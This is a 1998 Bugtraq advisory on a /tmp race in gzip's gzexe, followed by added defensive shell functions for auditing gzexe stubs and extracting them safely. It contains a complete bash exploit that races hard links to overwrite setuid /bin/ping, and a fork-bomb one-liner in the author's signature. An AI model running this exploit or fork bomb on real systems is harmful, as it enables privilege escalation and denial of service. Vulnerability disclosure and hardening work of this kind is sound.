Bugtraq mailing list archives
GZEXE - the big problem
From: lcamtuf () BOSS STASZIC WAW PL (Michał Zalewski)
Date: Wed, 28 Jan 1998 21:41:53 +0100
** DESCRIPTION **

GZEXE, part of the gzip package, is a small utility which allows
'transparent' compression of any kind of executables (just like pklite
under MS-DOS). Unfortunately, it may be extremely dangerous. Here's the
shell script used for decompression:

if /usr/bin/tail +$skip $0 | "/usr/bin"/gzip -cd > /tmp/gztmp$$; then...
                             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[...]
/tmp/gztmp$$ ${1+"$@"}; res=$?
^^^^^^^^^^^^

Just look at this... An example of a badly-written one ;)

It's possible to overwrite any file (including SUIDs!) with the code of
the gzexed executable when root executes it... Then, this unwanted suid
may be easily exploited.

It's also possible to enforce execution of OUR OWN code instead of the
gzexed program, just by choosing as a victim any file not owned by the
user running vulnerable executables, but writable by him/her. This file
(even setuid) may be freely modified by the attacker... Whoops!

** EXPLOIT **

-- GZEXE EXPLOIT --

#!/bin/bash

# GZEXE executables exploit (gzip 1.2.4)
# by Michal Zalewski (lcamtuf () staszic waw pl)
# ---------------------------------------------

VICTIM=/bin/ping
GZEXED=a.out

# Note: to locate gzexed executables you may use this:
# find / -type f -exec grep "/tmp/gztmp\\\$\\\$ \\\$" {} \; -print|cut -f 1 -d " "

if [ ! -f $VICTIM ]; then
  echo "I can't find my victim ($VICTIM)..."
  exit 0
fi

ORIG=`ls -l $VICTIM|awk '{print \$5}'`

echo "GZEXE exploit launched against $VICTIM ($ORIG bytes)."

renice +20 $PPID >&/dev/null

cd /tmp

touch $GZEXED

while :; do

  START=`ps|awk '$6=="ps"{print $1}'`

  let START=START+100
  let DO=START+100

  while [ "$START" -lt "$DO" ]; do
    ln $VICTIM gztmp$START &>/dev/null
    let START=START+1
  done

  sleep 10

  rm -f gztmp* &>/dev/null

  NOWY=`ls -l $VICTIM|awk '{print \$5}'`

  if [ ! "$ORIG" = "$NOWY" ]; then
    echo "Done, my master."
    exit 0
  fi

done

-- EOF --

It may be left in the background, just like my gcc-exploit-2. Please
verify the vulnerable executable filename (GZEXED - you may specify more
than one file, separated by spaces).

** FIX **

DO NOT USE GZEXE TO COMPRESS EXECUTABLES. That's all, TMPDIR will NOT
help in this case.

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf () boss staszic waw pl]
To iterate is human, to recurse divine [P. Deutsch]
=------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=
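The post's fix is to stop using gzexe altogether. As an added example that is not part of the original post or of the gzip package, the shell functions below show the two halves a defender wants from it: an audit that finds gzexe-style stubs on a filesystem (keyed on the same `/tmp/gztmp$$` marker the post's note greps for, with setuid ones flagged) and a stub variant that decompresses into a freshly created `mktemp -d` directory instead of a predictable name under world-writable `/tmp`, so a hard link or symlink cannot be planted where the `>` redirection will write. The function names, the `gzexe.XXXXXX` template and the constructed demo files are assumptions of this example; the `skip=` variable is what gzip's own stubs use to record where the compressed data starts (the quoted `tail +$skip $0`).

```sh
#!/bin/sh
# Added example, not from the original post or from gzip: audit for gzexe
# stubs and a hardened extraction pattern. All names here are assumptions.

# is_gzexe_stub FILE -> success if FILE starts with a gzexe-style shell stub
# that decompresses into the predictable /tmp/gztmp$$ name quoted in the post.
is_gzexe_stub() {
    head -n 40 "$1" 2>/dev/null | grep -q '/tmp/gztmp\$\$'
}

# find_gzexe_stubs DIR -> one line per executable stub under DIR:
# "SUID path" for setuid ones (the case the post abuses), "---- path" otherwise.
find_gzexe_stubs() {
    find "$1" -type f -perm -100 2>/dev/null | sort | while IFS= read -r f; do
        if is_gzexe_stub "$f"; then
            if [ -u "$f" ]; then flag=SUID; else flag=----; fi
            printf '%s %s\n' "$flag" "$f"
        fi
    done
}

# safe_extract_run STUB [ARGS...] -> decompress the gzip data appended to STUB
# into a private directory and run it from there. mktemp -d creates the
# directory with mode 0700 and an unpredictable name, so no other user can
# pre-create the file the redirection writes to; it honours TMPDIR too.
safe_extract_run() {
    stub=$1; shift
    # gzexe stubs store the first line of compressed data in skip=
    skip=$(sed -n 's/^skip=//p' "$stub" | head -n 1)
    [ -n "$skip" ] || return 2
    dir=$(mktemp -d "${TMPDIR:-/tmp}/gzexe.XXXXXX") || return 3
    trap 'rm -rf "$dir"' EXIT                 # clean up even if the payload fails
    tail -n "+$skip" "$stub" | gzip -cd > "$dir/prog" || return 4
    chmod 700 "$dir/prog"
    "$dir/prog" "$@"
    res=$?
    rm -rf "$dir"; trap - EXIT
    return $res
}

# make_demo_stub OUT -> constructed self-extracting file for trying the above:
# a three-line stub followed by a gzipped script that echoes its first argument.
make_demo_stub() {
    printf '#!/bin/sh\nskip=4\n# demo stub (constructed)\n' > "$1"
    printf '#!/bin/sh\necho "payload ran: $1"\n' | gzip -c >> "$1"
    chmod 700 "$1"
}

# make_vuln_stub OUT -> constructed file carrying the gzip-1.2.4 stub line the
# post quotes, so the audit has something to find (no payload attached).
make_vuln_stub() {
    printf '#!/bin/sh\nskip=3\n/tmp/gztmp$$ ${1+"$@"}; res=$?\n' > "$1"
    chmod 700 "$1"
}

# demo: build both files in a scratch directory, audit it, run the safe one
demo() {
    scratch=$(mktemp -d "${TMPDIR:-/tmp}/gzexe-demo.XXXXXX") || return 1
    make_demo_stub "$scratch/demo"
    make_vuln_stub "$scratch/vuln"
    find_gzexe_stubs "$scratch"               # prints: ---- .../vuln
    safe_extract_run "$scratch/demo" hello    # prints: payload ran: hello
    rm -rf "$scratch"
}
```

Running `find_gzexe_stubs /` on a host inventories which binaries were packed this way; any line flagged `SUID` is the situation the post describes, since root executing that stub is what lets a pre-planted `/tmp/gztmp<pid>` hard link turn into a file overwrite. The private directory is what makes the extraction safe, not the `TMPDIR` honouring: the post is right that pointing the original stub at another directory changes nothing while the filename stays predictable and the directory stays shared.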